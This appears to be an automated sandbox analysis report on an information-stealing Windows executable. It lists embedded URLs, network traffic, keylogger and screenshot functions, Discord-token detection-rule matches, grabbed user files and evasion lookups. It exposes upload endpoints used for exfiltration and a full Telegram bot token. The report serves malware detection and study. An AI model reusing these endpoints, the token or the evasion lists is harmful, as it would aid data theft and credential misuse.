                            Source: K6aOw2Jmji.exe, 00000000.00000002.2163346779.00000267E9DBC000.00000004.00000020.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/NETFoundationProjectsCodeSigningCA2.crt0
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertCSRSA4096RootG5.crl0
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2163306563.00000267E9DA8000.00000004.00000020.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0F
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/NETFoundationProjectsCodeSigningCA2.crl0=
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267805C3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://james.newtonking.com/projects/json
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2163346779.00000267E9DBC000.00000004.00000020.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2163306563.00000267E9DA8000.00000004.00000020.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.000002678017F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://store5.gofile.io
                            Source: Amcache.hve.13.drString found in binary or memory: http://upx.sf.net
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2163346779.00000267E9DBC000.00000004.00000020.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                            Source: tmpBD46.tmp.dat.0.dr, tmpA5ED.tmp.dat.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.000002678017F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.000002678017F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.000002678017F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/servers
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780066000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2156264198.000002678006C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7785245272:AAH0cMtovkeY5pOmhg0m00YxvD3gghupGfE/getMe
                            Source: tmpBD46.tmp.dat.0.dr, tmpA5ED.tmp.dat.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                            Source: tmpBD46.tmp.dat.0.dr, tmpA5ED.tmp.dat.0.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                            Source: tmpBD46.tmp.dat.0.dr, tmpA5ED.tmp.dat.0.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                            Source: tmpBD46.tmp.dat.0.dr, tmpA5ED.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                            Source: tmpBD46.tmp.dat.0.dr, tmpA5ED.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                            Source: tmpBD46.tmp.dat.0.dr, tmpA5ED.tmp.dat.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2163140895.00000267E9D10000.00000004.08000000.00040000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/icsharpcode/SharpZipLib
                            Source: K6aOw2Jmji.exeString found in binary or memory: https://github.com/kgnfth
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
                            Source: K6aOw2Jmji.exeString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/
                            Source: K6aOw2Jmji.exeString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/MachineGuid.txt
                            Source: K6aOw2Jmji.exeString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/gpu_list.txt
                            Source: K6aOw2Jmji.exeString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/ip_list.txt
                            Source: K6aOw2Jmji.exeString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_name_list.txt
                            Source: K6aOw2Jmji.exeString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/pc_username_list.txt
                            Source: K6aOw2Jmji.exeString found in binary or memory: https://raw.githubusercontent.com/6nz/virustotal-vm-blacklist/main/processes_list.txt
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2162777253.00000267E9917000.00000004.00000020.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780643000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/icsharpcode/SharpZipLib/33f64eb0f28cdd2b084cb822fcc224c7c5aba553/
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.000002678017F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store5.gofile.io
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.000002678017F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store5.gofile.io/X
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.000002678017F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://store5.gofile.io/uploadfile
                            Source: tmp871D.tmp.dat.0.drString found in binary or memory: https://support.mozilla.org
                            Source: tmp871D.tmp.dat.0.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                            Source: tmp871D.tmp.dat.0.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                            Source: tmpA62E.tmp.dat.0.dr, tmpA64E.tmp.dat.0.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                            Source: tmpA62E.tmp.dat.0.dr, tmpA64E.tmp.dat.0.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                            Source: tmpA62E.tmp.dat.0.dr, tmpA64E.tmp.dat.0.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                            Source: tmpA62E.tmp.dat.0.dr, tmpA64E.tmp.dat.0.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://szurubooru.zulipchat.com/api/v1/messages
                            Source: tmpBD46.tmp.dat.0.dr, tmpA5ED.tmp.dat.0.drString found in binary or memory: https://www.ecosia.org/newtab/
                            Source: tmpBD46.tmp.dat.0.dr, tmpA5ED.tmp.dat.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                            Source: tmp871D.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org
                            Source: tmp871D.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                            Source: tmp871D.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.00000267806FD000.00000004.00000800.00020000.00000000.sdmp, History.txt0.0.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                            Source: tmpEA9D.tmp.dat.0.dr, tmp871D.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                            Source: tmp871D.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                            Source: tmpEA9D.tmp.dat.0.dr, tmp871D.tmp.dat.0.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2163346779.00000267E9DBC000.00000004.00000020.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/json
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.newtonsoft.com/jsonschema
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmp, K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                            Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49732 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49731 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49730 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49735 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49733 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.4:49734 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49736 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 45.112.123.126:443 -> 192.168.2.4:49739 version: TLS 1.2
                            Source: unknownHTTPS traffic detected: 31.14.70.244:443 -> 192.168.2.4:49740 version: TLS 1.2

                            Key, Mouse, Clipboard, Microphone and Screen Capturing

                            barindex
                            Source: K6aOw2Jmji.exe, DesktopScreenshot.cs.Net Code: Make
                            Source: K6aOw2Jmji.exe, Keylogger.cs.Net Code: SetHook
                            Source: K6aOw2Jmji.exe, Keylogger.cs.Net Code: KeyboardLayout
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                            Spam, unwanted Advertisements and Ransom Demands

                            barindex
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeFile deleted: C:\Users\user\AppData\Local\cd25dd7bb63c454ece9a13d4ee42da59\user@910646_en-CH\Grabber\DRIVE-C\Users\user\Desktop\LTKMYBSEYZ.pdfJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeFile deleted: C:\Users\user\AppData\Local\cd25dd7bb63c454ece9a13d4ee42da59\user@910646_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UMMBDNEQBN\WUTJSCBCFX.jpgJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeFile deleted: C:\Users\user\AppData\Local\cd25dd7bb63c454ece9a13d4ee42da59\user@910646_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\VLZDGUKUTZ.docxJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeFile deleted: C:\Users\user\AppData\Local\cd25dd7bb63c454ece9a13d4ee42da59\user@910646_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\DVWHKMNFNN.pngJump to behavior
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeFile deleted: C:\Users\user\AppData\Local\cd25dd7bb63c454ece9a13d4ee42da59\user@910646_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\KATAXZVCPS.pdfJump to behavior

                            System Summary

                            barindex
                            Source: K6aOw2Jmji.exe, type: SAMPLEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                            Source: 0.0.K6aOw2Jmji.exe.267e6f40000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                            Source: 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                            Source: 00000000.00000000.1678272821.00000267E6F42000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                            Source: Process Memory Space: K6aOw2Jmji.exe PID: 6400, type: MEMORYSTRMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: user@910646_en-CH.zip.0.drZip Entry: encrypted
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeCode function: 0_2_00007FFD9B888C520_2_00007FFD9B888C52
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeCode function: 0_2_00007FFD9B8A78D80_2_00007FFD9B8A78D8
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeCode function: 0_2_00007FFD9B880F830_2_00007FFD9B880F83
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeCode function: 0_2_00007FFD9B887EA60_2_00007FFD9B887EA6
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeCode function: 0_2_00007FFD9B8A8E280_2_00007FFD9B8A8E28
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeCode function: 0_2_00007FFD9B8B62780_2_00007FFD9B8B6278
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeCode function: 0_2_00007FFD9B8A70600_2_00007FFD9B8A7060
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeCode function: 0_2_00007FFD9B8AB0A00_2_00007FFD9B8AB0A0
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeCode function: 0_2_00007FFD9B8824FA0_2_00007FFD9B8824FA
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeCode function: 0_2_00007FFD9B8A2A0D0_2_00007FFD9B8A2A0D
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeCode function: 0_2_00007FFD9B8A79880_2_00007FFD9B8A7988
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeCode function: 0_2_00007FFD9B8ADC710_2_00007FFD9B8ADC71
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeCode function: 0_2_00007FFD9B8A90F00_2_00007FFD9B8A90F0
                            Source: C:\Users\user\Desktop\K6aOw2Jmji.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6400 -s 3132
                            Source: K6aOw2Jmji.exeStatic PE information: No import functions for PE file found
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2163140895.00000267E9D10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameICSharpCode.SharpZipLib.dllP vs K6aOw2Jmji.exe
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs K6aOw2Jmji.exe
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.0000026790070000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameICSharpCode.SharpZipLib.dllP vs K6aOw2Jmji.exe
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.0000026780643000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameICSharpCode.SharpZipLib.dllP vs K6aOw2Jmji.exe
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2158644131.000002679014F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs K6aOw2Jmji.exe
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2156264198.000002678017F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamestub.exe6 vs K6aOw2Jmji.exe
                            Source: K6aOw2Jmji.exe, 00000000.00000002.2164030324.00000267EA190000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameNewtonsoft.Json.dll2 vs K6aOw2Jmji.exe
                            Source: K6aOw2Jmji.exeBinary or memory string: OriginalFilenamestub.exe6 vs K6aOw2Jmji.exe
                            Source: K6aOw2Jmji.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: 0.0.K6aOw2Jmji.exe.267e6f40000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: 00000000.00000002.2156264198.00000267800DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: 00000000.00000000.1678272821.00000267E6F42000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: Process Memory Space: K6aOw2Jmji.exe PID: 6400, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                            Source: K6aOw2Jmji.exe, Report.csTask registration methods: 'CreateTask'
                            Source: classification engineClassification label: mal100.rans.troj.spyw.evad.winEXE@19/85@7/5
